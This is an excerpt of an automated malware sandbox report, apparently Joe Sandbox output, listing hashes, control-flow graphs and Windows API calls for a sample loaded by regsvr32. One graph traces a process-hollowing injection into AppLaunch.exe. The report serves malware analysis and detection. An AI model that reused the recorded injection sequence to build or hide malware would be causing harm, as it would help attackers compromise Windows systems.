                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44a75f4bdff703b4b16b7cb10d5139dffa645a459c7b106ea2416c527fb4e638
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8475a932525000db7fc2d49a9e4ad377bf82fef198a3f7c10188e75561372b36
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F915D76E001198FCB14CFA9C94069DFBB6FF88314F2A825AD449AB355DA34BD56CF80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515418875.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2d60000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a9f1d751555d13459d95368471084042599c89ac2252fe832f5e0c2240145a6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 428dd54d661fc465f80336e4705b15fa1145da59c309bd06e74f3ec778d5c2aa
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a9f1d751555d13459d95368471084042599c89ac2252fe832f5e0c2240145a6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39819CB4D042188FDB14CF99C994AADFBB1FF88310F2581AED908AB356D735A985CF50
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 180 2d61e41-2d61eb6 181 2d62046-2d620a5 VirtualProtect 180->181 182 2d61ebc-2d61ee1 180->182 183 2d61f05-2d61f6e call 2d61cad 182->183 184 2d61ee3 182->184 183->181 184->180
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515418875.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2d60000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2679148245
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 569615e65bc2c20c656e3898a915db55e7e51fab8e4d419bca1526dfe132d731
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7e1feff4196a67d1c547a60f4456e262092e9083a7894401df65bb276bf4e0f7
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569615e65bc2c20c656e3898a915db55e7e51fab8e4d419bca1526dfe132d731
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6419AB5E002288FDB64CF49C880B99FBB1FF49314F1581AAC949AB352D771AD85CF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515418875.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2d60000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b27270b4f2e77a118ce5400b62b6d1f5638d00b226004a06236dbc97385e55b6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 89cbb28179b0bc682453ad8ed11c18da549be6b1b82d0e39f2634e98ca40efbd
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b27270b4f2e77a118ce5400b62b6d1f5638d00b226004a06236dbc97385e55b6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 154112B09012058FDB44DFA9C5987AEBBF1FF48304F2485ADD858AB341D37AA946CF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                  Execution Coverage:0.5%
                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                  Signature Coverage:12.1%
                                                                                                                                                                                                                                                                                                                  Total number of Nodes:116
                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                                                                                                                                                                                                  execution_graph 49519 6ad13a GetEnvironmentStringsW 49520 6ad1d5 49519->49520 49521 6ad152 49519->49521 49522 6ad179 FreeEnvironmentStringsW 49521->49522 49523 6ad184 49521->49523 49522->49520 49524 6ad193 49523->49524 49526 6ad1a4 49523->49526 49525 6ad198 FreeEnvironmentStringsW 49524->49525 49525->49520 49527 6ad1cb FreeEnvironmentStringsW 49526->49527 49527->49520 49528 69f7e8 49529 69f824 49528->49529 49530 69f7f6 49528->49530 49530->49529 49531 69f811 RtlAllocateHeap 49530->49531 49531->49529 49531->49530 49532 628d60 49533 628d6a GetPEB 49532->49533 49535 628da3 49533->49535 49536 6850fa 49537 68511b 49536->49537 49541 685107 49536->49541 49546 684f75 49537->49546 49540 685130 CreateThread 49542 68515b 49540->49542 49543 68514f GetLastError 49540->49543 49558 684d9f 49540->49558 49552 684e7a 49542->49552 49543->49542 49545 685166 49547 684f86 49546->49547 49548 684f9a GetModuleHandleExW 49547->49548 49549 684fb7 49547->49549 49548->49549 49550 684e7a 2 API calls 49549->49550 49551 684fbf 49550->49551 49551->49540 49551->49542 49553 684e86 49552->49553 49557 684ea4 49552->49557 49554 684e8c CloseHandle 49553->49554 49555 684e95 49553->49555 49554->49555 49556 684e9b FreeLibrary 49555->49556 49555->49557 49556->49557 49557->49545 49559 684dab 49558->49559 49560 684db2 GetLastError RtlExitUserThread 49559->49560 49561 684dbf 49559->49561 49560->49561 49562 6114d3 49563 620a20 49562->49563 49566 623a30 49563->49566 49564 620a29 49572 623a61 49566->49572 49567 623ae0 CreateProcessW 49568 623d0d 49567->49568 49567->49572 49568->49564 49569 623b31 VirtualAllocEx 49569->49572 49570 623b79 Wow64GetThreadContext 49570->49568 49570->49572 49571 623b9e ReadProcessMemory VirtualAllocEx 49571->49572 49572->49567 49572->49569 49572->49570 49572->49571 49573 623bf3 WriteProcessMemory 49572->49573 49574 623c65 49572->49574 49573->49572 49575 623cc7 WriteProcessMemory Wow64SetThreadContext 49574->49575 49576 623c80 WriteProcessMemory 49574->49576 49577 616636 49575->49577 49576->49576 49578 623cc4 49576->49578 49579 623d05 ResumeThread 49577->49579 49578->49575 49579->49568 49580 6b137d 49581 6b138d 49580->49581 49582 6b13ab 49580->49582 49581->49582 49584 6117f8 49581->49584 49584->49581 49585 6a10ca 49584->49585 49586 6a10fb 49585->49586 49590 6a0f0b GetStartupInfoW GetFileType 49585->49590 49586->49581 49588 6a10f6 49591 6a0fee GetStdHandle GetFileType 49588->49591 49590->49588 49591->49586 49592 6a1b4d 49595 6a18f8 49592->49595 49596 6a1926 49595->49596 49599 6a1922 49595->49599 49596->49599 49602 6a17fb 49596->49602 49600 6a1940 GetProcAddress 49600->49599 49601 6a1950 49600->49601 49601->49599 49608 6a180c 49602->49608 49603 6a18a2 49603->49599 49603->49600 49604 6a182a LoadLibraryExW 49605 6a18a9 49604->49605 49606 6a1845 GetLastError 49604->49606 49605->49603 49607 6a18bb FreeLibrary 49605->49607 49606->49608 49607->49603 49608->49603 49608->49604 49609 6a1878 LoadLibraryExW 49608->49609 49609->49605 49609->49608 49610 6984c1 49613 6981fe 49610->49613 49614 69822b 49613->49614 49616 69823d 49613->49616 49630 698300 GetModuleHandleW 49614->49630 49618 69827a 49616->49618 49623 6982ba 49616->49623 49617 698230 49617->49616 49631 69837d GetModuleHandleExW 49617->49631 49621 69828f 49637 698353 49623->49637 49626 6982d8 49628 69837d 3 API calls 49626->49628 49627 6982c8 GetCurrentProcess TerminateProcess 49627->49626 49629 6982e0 ExitProcess 49628->49629 49630->49617 49632 6983dd 49631->49632 49633 6983bc GetProcAddress 49631->49633 49635 69823c 49632->49635 49636 6983e3 FreeLibrary 49632->49636 49633->49632 49634 6983d0 49633->49634 49634->49632 49635->49616 49636->49635 49638 698358 49637->49638 49639 69835d GetPEB 49638->49639 49640 6982c4 49638->49640 49639->49640 49640->49626 49640->49627 49641 69f726 49644 69f733 49641->49644 49642 69f75e RtlAllocateHeap 49643 69f771 49642->49643 49642->49644 49644->49642 49644->49643 49645 6851a7 49648 684f09 49645->49648 49649 684f14 49648->49649 49650 684f56 RtlExitUserThread 49649->49650 49651 684f40 49649->49651 49652 684f39 CloseHandle 49649->49652 49651->49650 49653 684f4c FreeLibraryAndExitThread 49651->49653 49652->49651 49653->49650 49654 6a2815 49655 6a2827 GetPEB 49654->49655 49656 6a283a 49654->49656 49655->49656

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00623B05
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00623B00
                                                                                                                                                                                                                                                                                                                  • D, xrefs: 00623AD4
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe$D
                                                                                                                                                                                                                                                                                                                  • API String ID: 963392458-248988016
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ec3cee29cd6db944cbcd7f3c9fe957c9416eff355ee43f5cf4ffda801d589c2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a5ac298823006ef84411ec734f0257c018cb7603dd62196c6f980acfa64db1b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec3cee29cd6db944cbcd7f3c9fe957c9416eff355ee43f5cf4ffda801d589c2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF819971D00669ABCB10CFA4DD05BADBBB2FF49710F10416AF604BA2A0E7751A41DF95
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 42 6a17fb-6a1807 43 6a1899-6a189c 42->43 44 6a180c-6a181d 43->44 45 6a18a2 43->45 47 6a182a-6a1843 LoadLibraryExW 44->47 48 6a181f-6a1822 44->48 46 6a18a4-6a18a8 45->46 51 6a18a9-6a18b9 47->51 52 6a1845-6a184e GetLastError 47->52 49 6a1828 48->49 50 6a18c2-6a18c4 48->50 54 6a1896 49->54 50->46 51->50 53 6a18bb-6a18bc FreeLibrary 51->53 55 6a1850-6a1862 call 61553d 52->55 56 6a1887-6a1894 52->56 53->50 54->43 55->56 59 6a1864-6a1876 call 61553d 55->59 56->54 59->56 62 6a1878-6a1885 LoadLibraryExW 59->62 62->51 62->56
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 006A18BC
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 736f01fd5b5bd069fbd08018c4920577219a9ce800b15dc1ed375f1c6e220830
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2462c182b400bcbe68a0664c22f1232551787d4aa057d549a9c8945b4076ee5d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 736f01fd5b5bd069fbd08018c4920577219a9ce800b15dc1ed375f1c6e220830
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A121A831E01115EBC725AB659C44AEA77BBAF437A0F298224E955AB3D0D738ED00CAD0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 006AD142
                                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006AD17A
                                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006AD19A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d95cdd5c238e6e00c8e7d0205ecb3bdab849dfe498ff9b684d2717337828519b
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8608e47f7dd4a457b8ffab119a287fa01a706aeae0f078100290daa5f4c2dda2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d95cdd5c238e6e00c8e7d0205ecb3bdab849dfe498ff9b684d2717337828519b
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 791126B55051057F672137B6AC8DCFF29BFEE8A3943144028F802D2100FE34CE428978
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 89 684f09-684f16 call 616802 92 684f18-684f20 89->92 93 684f56-684f5f RtlExitUserThread 89->93 92->93 94 684f22-684f26 92->94 95 684f28 call 611267 94->95 96 684f2d-684f33 94->96 95->96 98 684f40-684f46 96->98 99 684f35-684f37 96->99 98->93 101 684f48-684f4a 98->101 99->98 100 684f39-684f3a CloseHandle 99->100 100->98 101->93 102 684f4c-684f50 FreeLibraryAndExitThread 101->102 102->93
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00684F3A
                                                                                                                                                                                                                                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?), ref: 00684F50
                                                                                                                                                                                                                                                                                                                  • RtlExitUserThread.NTDLL(?), ref: 00684F59
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ExitThread$CloseFreeHandleLibraryUser
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4027996483-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 425f52d993aa0fafd13f3692d85e425f3b435e29601804c4f971ea8cf0720c90
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 84658315b4280f05af5cea7e34db6d2a713f792cb2b8e32422d0c96533c772ad
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 425f52d993aa0fafd13f3692d85e425f3b435e29601804c4f971ea8cf0720c90
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F05E304056067BDB35AB69DD09ADA3AAA6F81360F09C758BA3DC72E0EF34DC41C759
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0069828F,?,?,?,?,FF670357), ref: 006982CB
                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0069828F,?,?,?,?,FF670357), ref: 006982D2
                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 006982E4
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 81fbe35045b1ad6c4e1fc81a3c464940fe39b9defb6ad7fadfad6386507ce72f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: d83f11917624cc1f167e291498929b11a6c353bd6fd695425e1842529dfe0c93
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81fbe35045b1ad6c4e1fc81a3c464940fe39b9defb6ad7fadfad6386507ce72f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62D09E31004148BFCF453FA5DC0E89D3F3AAF81741744C454B90946571DF359951EB88
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 110 6850fa-685105 111 68511b-68512e call 684f75 110->111 112 685107-68511a call 6139b8 call 61376f 110->112 117 68515c 111->117 118 685130-68514d CreateThread 111->118 122 68515e-68516a call 684e7a 117->122 120 68516b-685170 118->120 121 68514f-68515b GetLastError call 614aca 118->121 126 685172-685175 120->126 127 685177-68517b 120->127 121->117 126->127 127->122
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(?,?,Function_00074D9F,00000000,?,?), ref: 00685143
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0068514F
